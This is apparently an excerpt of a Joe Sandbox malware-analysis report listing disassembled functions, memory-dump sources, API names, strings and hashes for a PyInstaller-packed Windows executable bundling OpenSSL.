                                                              Function 00007FF6FB1F55A0 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID: -$:$f$p$p
                                                              • API String ID: 3215553584-2013873522
                                                              • Opcode ID: 6485ef080591767760fe67f9caec812fff4e1ba5c20858478bd9f0fbec74de2f
                                                              • Instruction ID: 425afb690ce728bd8f81615d2566d3da986daa388b8db50b85d974ed8a3e8c18
                                                              • Opcode Fuzzy Hash: 6485ef080591767760fe67f9caec812fff4e1ba5c20858478bd9f0fbec74de2f
                                                              • Instruction Fuzzy Hash: 6812B571E0C24386FB24DB15D1542797692FB8879CF944136D6AA87AE8FF3CE590CB04
                                                              Function 00007FF6FB1F02E8 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID: f$f$p$p$f
                                                              • API String ID: 3215553584-1325933183
                                                              • Opcode ID: 47a7a6303f50c331757a7ed503f6ccc132970c05c2223996d06c8e5714df85c4
                                                              • Instruction ID: e6ac04964fe0ad5565ba27a5d55502366ca34db5c8ade0f5475fa164ea720470
                                                              • Opcode Fuzzy Hash: 47a7a6303f50c331757a7ed503f6ccc132970c05c2223996d06c8e5714df85c4
                                                              • Instruction Fuzzy Hash: EF129462E0C14386FB20DF54E0587B97292FB88758F984135D6AA876E4FF7DE980CB50
                                                              Function 00007FFDFB0041D8 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 117networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1990278020.00007FFDFB001000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFB000000, based on PE: true
                                                              • Associated: 00000001.00000002.1990234767.00007FFDFB000000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB00D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB065000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB079000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB08A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB090000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB09D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB27A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2AB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2D1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB31F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB325000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB327000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB343000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB350000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991500652.00007FFDFB354000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991539153.00007FFDFB356000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb000000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastsetsockopt
                                                              • String ID: ..\s\crypto\bio\b_sock2.c$o
                                                              • API String ID: 1729277954-1872632005
                                                              • Opcode ID: 34993e59505dbed600dca64135d27a9ba0d4750b564e5c6ba914b5e12530ade6
                                                              • Instruction ID: 9593598e7065e74465ac96409bd3d581b4efafaa192e207518edd4a42d9f6c35
                                                              • Opcode Fuzzy Hash: 34993e59505dbed600dca64135d27a9ba0d4750b564e5c6ba914b5e12530ade6
                                                              • Instruction Fuzzy Hash: B751B171B0A54386E7209F21E824ABE7360FB82788F544235E6A843AEDCF3DE505DB04
                                                              Function 00007FF6FB1E1050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 111COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Message
                                                              • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                              • API String ID: 2030045667-3659356012
                                                              • Opcode ID: 6856e602118002354ba9607ac17403177552b81d19a34f6e1506d3c37e34e51f
                                                              • Instruction ID: 6f7834727ce1eb4a92e1931a37700c06773c20887ed0693cc16d563ca2b5f628
                                                              • Opcode Fuzzy Hash: 6856e602118002354ba9607ac17403177552b81d19a34f6e1506d3c37e34e51f
                                                              • Instruction Fuzzy Hash: 85417C22E0864382FB20DB22A9545BEA390BB48BC8F444431ED6E87BF5FE2CF4548740
                                                              Function 00007FFDFB001D48 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 99libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1990278020.00007FFDFB001000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFB000000, based on PE: true
                                                              • Associated: 00000001.00000002.1990234767.00007FFDFB000000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB00D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB065000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB079000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB08A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB090000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB09D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB27A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2AB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2D1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB31F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB325000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB327000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB343000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB350000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991500652.00007FFDFB354000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991539153.00007FFDFB356000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb000000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: HandleModule$AddressProc
                                                              • String ID: OPENSSL_Applink$OPENSSL_Uplink(%p,%02X): $_ssl.pyd$_ssl_d.pyd
                                                              • API String ID: 1883125708-1130596517
                                                              • Opcode ID: c4aead17072fba216eea99f021f7cf45f47fd7f2a5a9cbf259b3f8ced4e703a5
                                                              • Instruction ID: 9803b1b65dcdc16cbacc15aadda5e4e92a1fef10f17bc6cb924356a2ff050c19
                                                              • Opcode Fuzzy Hash: c4aead17072fba216eea99f021f7cf45f47fd7f2a5a9cbf259b3f8ced4e703a5
                                                              • Instruction Fuzzy Hash: 45514865F0AB5382F711AF24A82097423A0FB597A8B044735D97D926FEEF7CB2858700
                                                              Function 00007FFDFB0023D3 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 94libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1990278020.00007FFDFB001000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFB000000, based on PE: true
                                                              • Associated: 00000001.00000002.1990234767.00007FFDFB000000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB00D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB065000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB079000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB08A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB090000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB09D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB27A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2AB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2D1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB31F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB325000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB327000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB343000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB350000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991500652.00007FFDFB354000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991539153.00007FFDFB356000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb000000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: InformationObjectUser$AddressErrorHandleLastModuleProcProcessStationWindow
                                                              • String ID: Service-0x$_OPENSSL_isservice
                                                              • API String ID: 1944374717-1672312481
                                                              • Opcode ID: b0e2507b54a2fee0f286af568643ff84d15fb4472f624db1291a1182b8891a4e
                                                              • Instruction ID: e7c1eed0caf162c8e92ff27ad89f55e5f9bcc8c92b741d87eed95b2499cdcb84
                                                              • Opcode Fuzzy Hash: b0e2507b54a2fee0f286af568643ff84d15fb4472f624db1291a1182b8891a4e
                                                              • Instruction Fuzzy Hash: 32413022B06B8796EB50AF24D960AA83390EF457B8B484735E9BD477F8DF3CE5448300
                                                              Function 00007FF6FB1E7FC0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 89processsynchronizationCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                              • String ID: CreateProcessW$Failed to create child process!
                                                              • API String ID: 2895956056-699529898
                                                              • Opcode ID: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
                                                              • Instruction ID: e80bbda4e40d2818f9b88610f948c8e1d78189ea65abe69411fbe6e041833de5
                                                              • Opcode Fuzzy Hash: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
                                                              • Instruction Fuzzy Hash: 7541EF35E1878281DB20DB24E4552AEA291FB8D364F540735E6BD877E9EF7CD044CB40
                                                              Function 00007FF6FB1EDD28 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                              • String ID: csm$csm$csm
                                                              • API String ID: 849930591-393685449
                                                              • Opcode ID: e61afc8d21ba52cdbe611d77afa9c967b031d652e012678c684f0478f5a183c7
                                                              • Instruction ID: 794c82b303f5e3d5b7cc6c91b9e4080ab274db0d023e0e03f98114b72fe0fbab
                                                              • Opcode Fuzzy Hash: e61afc8d21ba52cdbe611d77afa9c967b031d652e012678c684f0478f5a183c7
                                                              • Instruction Fuzzy Hash: D8D14C32E087468AEB60DB6594403AE77A0FB59B9CF100135EA6D97FA5EF38F491C740
                                                              Function 00007FF6FB1FE020 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • FreeLibrary.KERNEL32(?,?,?,00007FF6FB1FE3BA,?,?,0000022908958CB8,00007FF6FB1FA063,?,?,?,00007FF6FB1F9F5A,?,?,?,00007FF6FB1F524E), ref: 00007FF6FB1FE19C
                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF6FB1FE3BA,?,?,0000022908958CB8,00007FF6FB1FA063,?,?,?,00007FF6FB1F9F5A,?,?,?,00007FF6FB1F524E), ref: 00007FF6FB1FE1A8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeLibraryProc
                                                              • String ID: api-ms-$ext-ms-
                                                              • API String ID: 3013587201-537541572
                                                              • Opcode ID: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
                                                              • Instruction ID: f91773464e4e3cebfd30156d09eb2faf33cdbfea43315af6720a273f4a939758
                                                              • Opcode Fuzzy Hash: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
                                                              • Instruction Fuzzy Hash: D241CC22B19A0381EB26CB17A91467A2292BF8DBA8F084535DD2DD77E4FE3DE505C300
                                                              Function 00007FF6FB1E7C40 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 116COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetTempPathW.KERNEL32(?,?,FFFFFFFF,00007FF6FB1E3834), ref: 00007FF6FB1E7CE4
                                                              • CreateDirectoryW.KERNEL32(?,?,FFFFFFFF,00007FF6FB1E3834), ref: 00007FF6FB1E7D2C
                                                                • Part of subcall function 00007FF6FB1E7E10: GetEnvironmentVariableW.KERNEL32(00007FF6FB1E365F), ref: 00007FF6FB1E7E47
                                                                • Part of subcall function 00007FF6FB1E7E10: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6FB1E7E69
                                                                • Part of subcall function 00007FF6FB1F7548: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FB1F7561
                                                                • Part of subcall function 00007FF6FB1E26C0: MessageBoxW.USER32 ref: 00007FF6FB1E2736
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Environment$CreateDirectoryExpandMessagePathStringsTempVariable_invalid_parameter_noinfo
                                                              • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                              • API String ID: 740614611-1339014028
                                                              • Opcode ID: 41794429c51d27e0df7a21877b4f19c7cdf826b4f928fd21ea6cb85727b80d41
                                                              • Instruction ID: 3fab048a01c5c4017447e2a7546bf2296505fa9d9af4630f50572a24fffc5199
                                                              • Opcode Fuzzy Hash: 41794429c51d27e0df7a21877b4f19c7cdf826b4f928fd21ea6cb85727b80d41
                                                              • Instruction Fuzzy Hash: 1D411515E0A64380FB24EB61A9652B91291AF8DBC8F441131EE2DD7BF6FE2CF5088340
                                                              Function 00007FFDFB0060D2 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 227COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1990278020.00007FFDFB001000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFB000000, based on PE: true
                                                              • Associated: 00000001.00000002.1990234767.00007FFDFB000000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB00D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB065000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB079000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB08A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB090000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB09D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB27A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2AB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2D1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB31F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB325000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB327000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB343000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB350000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991500652.00007FFDFB354000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991539153.00007FFDFB356000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb000000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Fiber$Switch$CreateDelete
                                                              • String ID: *$..\s\crypto\async\async.c
                                                              • API String ID: 2050058302-1471988776
                                                              • Opcode ID: 419cdec9bab671cbcbab75131cab699312702b93d7ae234180eea406a646abb6
                                                              • Instruction ID: b94ec74ff9613146cc5d47408d55d93a44db47293c288d780f6a5ee74f8cf27e
                                                              • Opcode Fuzzy Hash: 419cdec9bab671cbcbab75131cab699312702b93d7ae234180eea406a646abb6
                                                              • Instruction Fuzzy Hash: 1BA16972B1AA4386EB24DF11E460A7963A0EF46B84F448031DAAD477F9EF3CE555E700
                                                              Function 00007FFDFB002E46 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 91COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1990278020.00007FFDFB001000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFB000000, based on PE: true
                                                              • Associated: 00000001.00000002.1990234767.00007FFDFB000000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB00D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB065000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB079000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB08A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB090000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB09D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB27A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2AB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2D1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB31F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB325000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB327000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB343000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB350000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991500652.00007FFDFB354000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991539153.00007FFDFB356000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb000000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentVariable
                                                              • String ID: OPENSSL_ia32cap$~$~$~$~
